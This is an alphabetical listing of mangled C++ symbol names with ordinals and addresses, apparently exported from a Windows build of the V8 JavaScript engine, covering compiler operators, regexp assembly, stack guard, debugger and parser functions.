                                  ?CheckEqualsInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36190x140ebc1c0
                                  ?CheckEqualsSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36200x140ebc1d0
                                  ?CheckExecutionState@Debug@internal@v8@@QEAA_NXZ36210x140421c80
                                  ?CheckFlagsForFunctionFromScript@ParseInfo@internal@v8@@QEAAXVScript@23@@Z36220x1400768e0
                                  ?CheckFlagsForToplevelCompileFromScript@ParseInfo@internal@v8@@AEAAXVScript@23@_N@Z36230x140739bf0
                                  ?CheckFloat64Hole@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z36240x140ff9d70
                                  ?CheckFloat64Hole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckFloat64HoleMode@234@AEBUFeedbackSource@234@@Z36250x140ebc1e0
                                  ?CheckFloatingPointParameters@CallInterfaceDescriptor@internal@v8@@IEAA_NPEAVCallInterfaceDescriptorData@23@@Z36260x140459720
                                  ?CheckFunctionName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4LanguageMode@23@PEBVAstRawString@23@W4FunctionNameValidity@23@AEBULocation@Scanner@23@@Z36270x1406f97c0
                                  ?CheckGC@StackGuard@internal@v8@@QEAA_NXZ36280x140421c90
                                  ?CheckGreedyLoop@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z36290x1406c9820
                                  ?CheckGreedyLoop@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z36300x140443c80
                                  ?CheckGrowSharedMemory@StackGuard@internal@v8@@QEAA_NXZ36310x140421ca0
                                  ?CheckHeapObject@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36320x140ebc350
                                  ?CheckIf@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4DeoptimizeReason@34@@Z36330x140ec3ba0
                                  ?CheckIf@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z36340x140ebc360
                                  ?CheckIfElementsKind@JSCallReducer@compiler@internal@v8@@AEAAXPEAVNode@234@W4ElementsKind@34@0PEAPEAV5234@2@Z36350x140f3f9a0
                                  ?CheckInOrOf@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEAW4VisitMode@ForEachStatement@23@@Z36360x1406f9820
                                  ?CheckInitializedImpl@Internals@internal@v8@@SAXPEAVIsolate@3@@Z36370x140a7cd40
                                  ?CheckInstallCode@StackGuard@internal@v8@@QEAA_NXZ36380x140421cb0
                                  ?CheckInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36390x140ebc9b0
                                  ?CheckInterrupt@StackGuard@internal@v8@@AEAA_NW4InterruptFlag@123@@Z36400x14096c760
                                  ?CheckIsolateLayout@Isolate@internal@v8@@AEAAXXZ36410x1400768e0
                                  ?CheckLogWasmCode@StackGuard@internal@v8@@QEAA_NXZ36420x140421cc0
                                  ?CheckMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Flags@W4CheckMapsFlag@compiler@internal@v8@@H@base@4@V?$ZoneHandleSet@VMap@internal@v8@@@34@AEBUFeedbackSource@234@@Z36430x140ebc9c0
                                  ?CheckMemoryPressure@Isolate@v8@@AEAAXXZ36440x1400768e0
                                  ?CheckMinusZeroParametersOf@compiler@internal@v8@@YAAEBVCheckMinusZeroParameters@123@PEBVOperator@123@@Z36450x1402e6a30
                                  ?CheckNoArrayBufferBackingStores@Deserializer@internal@v8@@IEAAXXZ36460x1405ffd20
                                  ?CheckNoDirtyFinalizationRegistries@StartupSerializer@internal@v8@@QEAAXXZ36470x1405ff480
                                  ?CheckNotAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z36480x1406c98f0
                                  ?CheckNotAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z36490x140443d80
                                  ?CheckNotBackReference@RegExpBytecodeGenerator@internal@v8@@UEAAXH_NPEAVLabel@23@@Z36500x1406c99c0
                                  ?CheckNotBackReference@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_NPEAVLabel@23@@Z36510x140443e60
                                  ?CheckNotBackReferenceIgnoreCase@RegExpBytecodeGenerator@internal@v8@@UEAAXH_NPEAVLabel@23@@Z36520x1406c9aa0
                                  ?CheckNotBackReferenceIgnoreCase@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_NPEAVLabel@23@@Z36530x140444340
                                  ?CheckNotCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z36540x1406c9b80
                                  ?CheckNotCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z36550x140444b10
                                  ?CheckNotCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z36560x1406c9c90
                                  ?CheckNotCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z36570x140444b80
                                  ?CheckNotCharacterAfterMinusAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXGGGPEAVLabel@23@@Z36580x1406c9dc0
                                  ?CheckNotCharacterAfterMinusAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGGPEAVLabel@23@@Z36590x140444c40
                                  ?CheckNotTaggedHole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36600x140ebca90
                                  ?CheckNumber@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z36610x140ff9e00
                                  ?CheckNumber@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36620x140ebcaa0
                                  ?CheckPageFlag@TurboAssembler@internal@v8@@QEAAXVRegister@23@0HW4Condition@23@PEAVLabel@23@W4Distance@623@@Z36630x140498660
                                  ?CheckPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z36640x140444d40
                                  ?CheckPossibleEvalCall@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4PossiblyEval@Call@23@PEAVExpression@23@PEAVScope@23@@Z36650x1406f9890
                                  ?CheckPreemption@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ36660x140444e60
                                  ?CheckReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36670x140ebcbf0
                                  ?CheckReceiverOrNullOrUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36680x140ebcc00
                                  ?CheckRegion@RegionAllocator@base@v8@@QEAA_K_K@Z36690x140dcaab0
                                  ?CheckRehashability@ContextSerializer@internal@v8@@AEAAXVHeapObject@23@@Z36700x1406101d0
                                  ?CheckSmi@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36710x140ebcc10
                                  ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VOperand@23@@Z36720x1404987b0
                                  ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VRegister@23@@Z36730x1404987f0
                                  ?CheckSpecialCharacterClass@RegExpMacroAssemblerX64@internal@v8@@UEAA_NGPEAVLabel@23@@Z36740x140444ef0
                                  ?CheckStackAlignment@TurboAssembler@internal@v8@@QEAAXXZ36750x140498820
                                  ?CheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@SAHPEA_K_K1@Z36760x140445630
                                  ?CheckStackLimit@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ36770x140445670
                                  ?CheckStackOverflow@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ36780x1406f9900
                                  ?CheckStrictOctalLiteral@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHH@Z36790x1406f9930
                                  ?CheckString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36800x140ebcd00
                                  ?CheckSubsample@CpuProfile@internal@v8@@QEAA_NVTimeDelta@base@3@@Z36810x1406d4ed0
                                  ?CheckSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36820x140ebcdf0
                                  ?CheckTemplateEscapes@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_N_N@Z36830x1406f99c0
                                  ?CheckTerminateExecution@StackGuard@internal@v8@@QEAA_NXZ36840x140421cd0
                                  ?CheckWasmCodeGC@StackGuard@internal@v8@@QEAA_NXZ36850x140421ce0
                                  ?CheckedFloat64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z36860x140ebce00
                                  ?CheckedFloat64ToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z36870x140ebcf60
                                  ?CheckedInt32Add@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36880x140ebd0c0
                                  ?CheckedInt32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36890x140ebd0d0
                                  ?CheckedInt32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36900x140ebd0e0
                                  ?CheckedInt32Mul@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z36910x140ebd0f0
                                  ?CheckedInt32Sub@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36920x140ebd130
                                  ?CheckedInt32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36930x140ebd140
                                  ?CheckedInt64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36940x140ebd230
                                  ?CheckedInt64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36950x140ebd320
                                  ?CheckedTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36960x140ebd410
                                  ?CheckedTaggedToArrayIndex@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36970x140ebd500
                                  ?CheckedTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z36980x140ebd5f0
                                  ?CheckedTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z36990x140ebd750
                                  ?CheckedTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z37000x140ebd8b0
                                  ?CheckedTaggedToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37010x140ebda10
                                  ?CheckedTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37020x140ebdb00
                                  ?CheckedTruncateTaggedToWord32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z37030x140ebdbf0
                                  ?CheckedUint32Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z37040x140ebdd50
                                  ?CheckedUint32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37050x140ebdea0
                                  ?CheckedUint32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37060x140ebdeb0
                                  ?CheckedUint32ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37070x140ebdec0
                                  ?CheckedUint32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37080x140ebdfb0
                                  ?CheckedUint64Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z37090x140ebe0a0
                                  ?CheckedUint64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37100x140ebe1f0
                                  ?CheckedUint64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37110x140ebe2e0
                                  ?Checkpoint@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37120x140e09840
                                  ?Checkpoint@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VFrameState@234@@Z37130x140ec3c90
                                  ?Checksum@internal@v8@@YAIV?$Vector@$$CBE@12@@Z37140x140602f50
                                  ?Clamp@Bignum@internal@v8@@AEAAXXZ37150x140848560
                                  ?Class@FieldType@internal@v8@@SA?AV123@VMap@23@@Z37160x140076a70
                                  ?Class@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@@Z37170x1407f4c70
                                  ?ClassFieldVariableName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEBVAstRawString@23@PEAVAstValueFactory@23@H@Z37180x1406f9a30
                                  ?ClassFieldsSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ37190x140891040
                                  ?ClassOf@ControlEquivalence@compiler@internal@v8@@QEAA_KPEAVNode@234@@Z37200x140fb5db0
                                  ?ClassPropertyKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4Kind@ClassLiteralProperty@23@W4ParsePropertyKind@23@@Z37210x1406f9c60
                                  ?ClassifyArrowParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAV?$AccumulationScope@U?$ParserTypes@VParser@internal@v8@@@internal@v8@@@23@HPEAVExpression@23@@Z37220x1406f9cb0
                                  ?ClassifyParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@HH@Z37230x1406f9e60
                                  ?Cleanup@FinalizationGroup@v8@@SA?AV?$Maybe@_N@2@V?$Local@VFinalizationGroup@v8@@@2@@Z37240x140a7cdc0
                                  ?CleanupOnStackReferencesBelowCurrentStackPosition@GlobalHandles@internal@v8@@QEAAXXZ37250x140964cd0
                                  ?Clear@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$Handle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V423@@Z37260x14075dd70
                                  ?Clear@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$Handle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z37270x14075dee0
                                  ?Clear@AddressToTraceMap@internal@v8@@QEAAXXZ37280x1406e9600
                                  ?Clear@BackingStore@internal@v8@@AEAAXXZ37290x14083ea80
                                  ?Clear@BitVector@internal@v8@@QEAAXXZ37300x140453530
                                  ?Clear@CodeObjectRegistry@internal@v8@@QEAAXXZ37310x1408d1900
                                  ?Clear@CompilationCache@internal@v8@@QEAAXXZ37320x1409f77f0
                                  ?Clear@FeedbackNexus@internal@v8@@QEAA_NXZ37330x1407f5550
                                  ?Clear@IdentityMapBase@internal@v8@@IEAAXXZ37340x1405f2ff0
                                  ?Clear@Map@v8@@QEAAXXZ37350x140a7d1b0
                                  ?Clear@MarkingWorklistsHolder@internal@v8@@QEAAXXZ37360x1408ef5b0
                                  ?Clear@NativeContextStats@internal@v8@@QEAAXXZ37370x1408ed220
                                  ?Clear@OSROptimizedCodeCache@internal@v8@@SAXVNativeContext@23@@Z37380x14075b8f0
                                  ?Clear@Set@v8@@QEAAXXZ37390x140a7d290
                                  ?Clear@StubCache@internal@v8@@QEAAXXZ37400x1408b4e00
                                  ?ClearAllBreakPoints@Debug@internal@v8@@AEAAXXZ37410x1409bec60
                                  ?ClearAllDebugInfos@Debug@internal@v8@@AEAAXAEBV?$function@$$A6AXV?$Handle@VDebugInfo@internal@v8@@@internal@v8@@@Z@std@@@Z37420x1409bed50
                                  ?ClearAllDebuggerHints@Debug@internal@v8@@AEAAXXZ37430x1409beeb0
                                  ?ClearAllocatorState@PagedSpace@internal@v8@@QEAAXXZ37440x140421cf0
                                  ?ClearApiInterrupt@StackGuard@internal@v8@@QEAAXXZ37450x140421d10
                                  ?ClearBlockById@Schedule@compiler@internal@v8@@QEAAXVId@BasicBlock@234@@Z37460x140e428e0
                                  ?ClearBreakFlags@Thread@WasmInterpreter@wasm@internal@v8@@QEAAXXZ37470x140543280
                                  ?ClearBreakOnNextFunctionCall@Debug@internal@v8@@QEAAXXZ37480x1409bef10
                                  ?ClearBreakOnNextFunctionCall@debug@v8@@YAXPEAVIsolate@2@@Z37490x140a7d370
                                  ?ClearBreakPoint@Debug@internal@v8@@QEAAXV?$Handle@VBreakPoint@internal@v8@@@23@@Z37500x1409bef40
                                  ?ClearBreakPoint@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@HV?$Handle@VBreakPoint@internal@v8@@@23@@Z37510x140566050
                                  ?ClearBreakPointById@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@H@Z37520x1405662b0
                                  ?ClearBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z37530x1409bf080
                                  ?ClearCachedIcuObjects@Isolate@internal@v8@@QEAAXXZ37540x14097b9d0
                                  ?ClearCodesInRange@CodeMap@internal@v8@@AEAAX_K0@Z37550x1406d4f00
                                  ?ClearDebugBreak@BreakIterator@internal@v8@@QEAAXXZ37560x1409bf260
                                  ?ClearDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAAXXZ37570x140421d20
                                  ?ClearDispatchTables@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@H@Z37580x14051f040
                                  ?ClearEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ37590x14097b9e0
                                  ?ClearEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z37600x140421d30
                                  ?ClearEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z37610x140421e10
                                  ?ClearEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z37620x14076fee0
                                  ?ClearEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z37630x140770060
                                  ?ClearEntry@OSROptimizedCodeCache@internal@v8@@AEAAXHPEAVIsolate@23@@Z37640x14075b990
                                  ?ClearGC@StackGuard@internal@v8@@QEAAXXZ37650x140421f90
                                  ?ClearGrowSharedMemory@StackGuard@internal@v8@@QEAAXXZ37660x140421fa0
                                  ?ClearInputs@Node@compiler@internal@v8@@AEAAXHH@Z37670x140e31a30
                                  ?ClearInstallCode@StackGuard@internal@v8@@QEAAXXZ37680x140421fb0
                                  ?ClearInterrupt@StackGuard@internal@v8@@AEAAXW4InterruptFlag@123@@Z37690x14096c7b0
                                  ?ClearInvalidSlots@TypedSlotSet@internal@v8@@QEAAXAEBV?$map@IIU?$less@I@std@@V?$allocator@U?$pair@$$CBII@std@@@2@@std@@@Z37700x1408d8440
                                  ?ClearKeptObjects@Isolate@internal@v8@@QEAAXXZ37710x14097ba80
                                  ?ClearKeptObjects@Isolate@v8@@QEAAXXZ37720x140a7d380
                                  ?ClearLogWasmCode@StackGuard@internal@v8@@QEAAXXZ37730x140421fc0
                                  ?ClearMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z37740x14095c500
                                  ?ClearMentionedObjectCache@StringStream@internal@v8@@SAXPEAVIsolate@23@@Z37750x1405fc1a0
                                  ?ClearObjectIds@HeapProfiler@v8@@QEAAXXZ37760x140a7d390
                                  ?ClearOneShot@Debug@internal@v8@@AEAAXXZ37770x1409bf2a0
                                  ?ClearPredecessors@BasicBlock@compiler@internal@v8@@QEAAXXZ37780x1404597a0
                                  ?ClearReconstructableDataForSerialization@Snapshot@internal@v8@@SAXPEAVIsolate@23@_N@Z37790x140600810
                                  ?ClearRegisters@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z37800x1406c9ee0
                                  ?ClearRegisters@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z37810x140445700
                                  ?ClearSegment@DateCache@internal@v8@@AEAAXPEAUDST@123@@Z37820x1409d3160
                                  ?ClearSerializerData@Isolate@internal@v8@@QEAAXXZ37830x14097ba90
                                  ?ClearSideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z37840x1409bf300
                                  ?ClearStepping@Debug@internal@v8@@QEAAXXZ37850x1409bf450
                                  ?ClearStepping@DebugInfo@wasm@internal@v8@@QEAAXXZ37860x140566420
                                  ?ClearStringPaddingIfNeeded@ReadOnlySpace@internal@v8@@QEAAXXZ37870x1408e2920
                                  ?ClearSuccessors@BasicBlock@compiler@internal@v8@@QEAAXXZ37880x1404597b0
                                  ?ClearTerminateExecution@StackGuard@internal@v8@@QEAAXXZ37890x140421fd0
                                  ?ClearWasmCodeGC@StackGuard@internal@v8@@QEAAXXZ37900x140421fe0
                                  ?ClearWeak@V8@v8@@CAPEAXPEA_K@Z37910x140a7d3e0
                                  ?ClearWeakness@GlobalHandles@internal@v8@@SAPEAXPEA_K@Z37920x140964ce0
                                  ?ClearedTypedSlot@TypedSlotSet@internal@v8@@CA?AUTypedSlot@TypedSlots@23@XZ37930x140421ff0
                                  ?ClobbersDoubleRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ37940x140453570
                                  ?ClobbersRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ37950x140453570
                                  ?ClobbersTemps@Instruction@compiler@internal@v8@@QEBA_NXZ37960x140453570
                                  ?Clone@Node@compiler@internal@v8@@SAPEAV1234@PEAVZone@34@IPEBV1234@@Z37970x140e31ad0
                                  ?Clone@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ37980x140a7d3f0
                                  ?CloneNode@Graph@compiler@internal@v8@@QEAAPEAVNode@234@PEBV5234@@Z37990x140ea58b0
                                  ?CloneObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z38000x140891050
                                  ?CloneObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@H@Z38010x140eac440
                                  ?CloneScript@Factory@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@23@V423@@Z38020x140944360
                                  ?CloseAndMakeIterable@LocalAllocationBuffer@internal@v8@@QEAA?AVLinearAllocationArea@23@XZ38030x1408d1aa0
                                  ?CloseTemplateLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@PEAPEAVTemplateLiteral@123@HPEAV423@@Z38040x14072bad0
                                  ?Cmp@MacroAssembler@internal@v8@@QEAAXVOperand@23@V?$Handle@VObject@internal@v8@@@23@@Z38050x140498890
                                  ?Cmp@MacroAssembler@internal@v8@@QEAAXVOperand@23@VSmi@23@@Z38060x140498960
                                  ?Cmp@MacroAssembler@internal@v8@@QEAAXVRegister@23@V?$Handle@VObject@internal@v8@@@23@@Z38070x1404989e0
                                  ?Cmp@MacroAssembler@internal@v8@@QEAAXVRegister@23@VSmi@23@@Z38080x140498a80
                                  ?CmpInstanceType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@@Z38090x140498af0
                                  ?CmpObjectType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@0@Z38100x140498b70
                                  ?Code@JSRegExp@internal@v8@@QEBA?AVObject@23@_N@Z38110x140770300
                                  ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@23@@Z38120x14084b8c0
                                  ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z38130x14084ba60
                                  ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z38140x14084bb10
                                  ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z38150x14084bb70
                                  ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z38160x14084bc90
                                  ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@23@@Z38170x1406d1700
                                  ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z38180x1406d17d0
                                  ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z38190x1406d1900
                                  ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z38200x1406d1a30
                                  ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z38210x1406d1c30
                                  ?CodeDeoptEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH@Z38220x1400768e0
                                  ?CodeDeoptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH@Z38230x1406d2630
                                  ?CodeDisableOptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z38240x1406d26f0
                                  ?CodeEntry@TurboAssembler@internal@v8@@QEAAXXZ38250x1400768e0
                                  ?CodeEventHandler@ProfilerCodeObserver@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z38260x1406e7400
                                  ?CodeEventHandler@ProfilerEventsProcessor@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z38270x1406e7420
                                  ?CodeEventHandlerInternal@ProfilerCodeObserver@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z38280x1406e74c0
                                  ?CodeMoveEvent@ProfilerListener@internal@v8@@UEAAXVAbstractCode@23@0@Z38290x1406d2780
                                  ?CodeMovingGCEvent@CodeEventLogger@internal@v8@@UEAAXXZ38300x1400768e0
                                  ?CodeMovingGCEvent@ProfilerListener@internal@v8@@UEAAXXZ38310x1400768e0
                                  ?CodeObject@TurboAssemblerBase@internal@v8@@QEBA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ38320x140436180
                                  ?CodePageGuardSize@MemoryChunkLayout@internal@v8@@SA_KXZ38330x1408eeba0
                                  ?CodePageGuardStartOffset@MemoryChunkLayout@internal@v8@@SA_KXZ38340x1408eebb0
                                  ?CodeTargetAlign@Assembler@internal@v8@@QEAAXXZ38350x1404a0f60
                                  ?CollapseNaryExpression@Parser@internal@v8@@AEAA_NPEAPEAVExpression@23@PEAV423@W4Value@Token@23@HAEBUSourceRange@23@@Z38360x14072bcf0
                                  ?Collect@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VString@internal@v8@@@23@H@Z38370x1407f5790
                                  ?Collect@TypeProfile@debug@v8@@SA?AV123@PEAVIsolate@3@@Z38380x140a7d490
                                  ?CollectAllAvailableGarbage@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z38390x14092a5b0
